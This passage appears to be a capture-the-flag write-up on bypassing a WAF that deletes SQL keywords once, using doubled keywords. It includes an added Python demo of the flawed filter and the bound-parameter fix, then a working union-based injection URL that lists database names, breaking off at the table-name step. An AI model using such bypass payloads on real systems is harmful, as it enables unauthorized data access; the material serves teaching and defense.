Challenge key points
- Double-write bypass: the WAF replaces keywords with an empty string.
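Why a single replacement pass fails, and what holds up instead, as an added example that is not part of the original write-up. The keyword list is an assumption inferred from the doubled words in the step 1 payload, and the in-memory SQLite table with its constructed password stands in for the challenge's MySQL backend.

```python
import re
import sqlite3
from urllib.parse import unquote

# Assumed blocklist: the keywords that appear doubled in the step-1 payload.
KEYWORDS = ("union", "select", "from", "or")
PATTERN = re.compile("|".join(KEYWORDS), re.IGNORECASE)

# The password parameter from step 1, URL-decoded.
PAYLOAD = unquote(
    "admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)"
    "%20frfromom%20infoorrmation_schema.schemata%20%23"
)

def strip_once(value):
    """Flawed filter: one pass that deletes every keyword match."""
    return PATTERN.sub("", value)

def strip_until_stable(value):
    """Repeat the deletion until a pass changes nothing."""
    previous = None
    while previous != value:
        previous, value = value, PATTERN.sub("", value)
    return value

def is_rejected(value):
    """Refuse the request instead of rewriting it."""
    return PATTERN.search(value) is not None

def make_db():
    """In-memory SQLite stand-in for the MySQL users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn

def login(conn, username, password):
    """Bound parameters: the input is always data, so no keyword filter is needed."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    print("single pass :", strip_once(PAYLOAD))
    print("until stable:", strip_until_stable(PAYLOAD))
    print("rejected    :", is_rejected(PAYLOAD))
    print("bound login :", login(make_db(), "admin", PAYLOAD))
```

The single pass rebuilds the keywords because deleting the inner match joins the fragments on either side of it. Repeating the deletion or rejecting the request closes that gap but still mangles or blocks legitimate input that contains "or", which is why the bound-parameter query is the durable fix.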
Challenge description
Solution
1. Query the databases
/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23
Result
Hello 2!
Your password is ‘information_schema,mysql,performance_schema,test,ctf,geek’
2. Query the table names
/check.php?username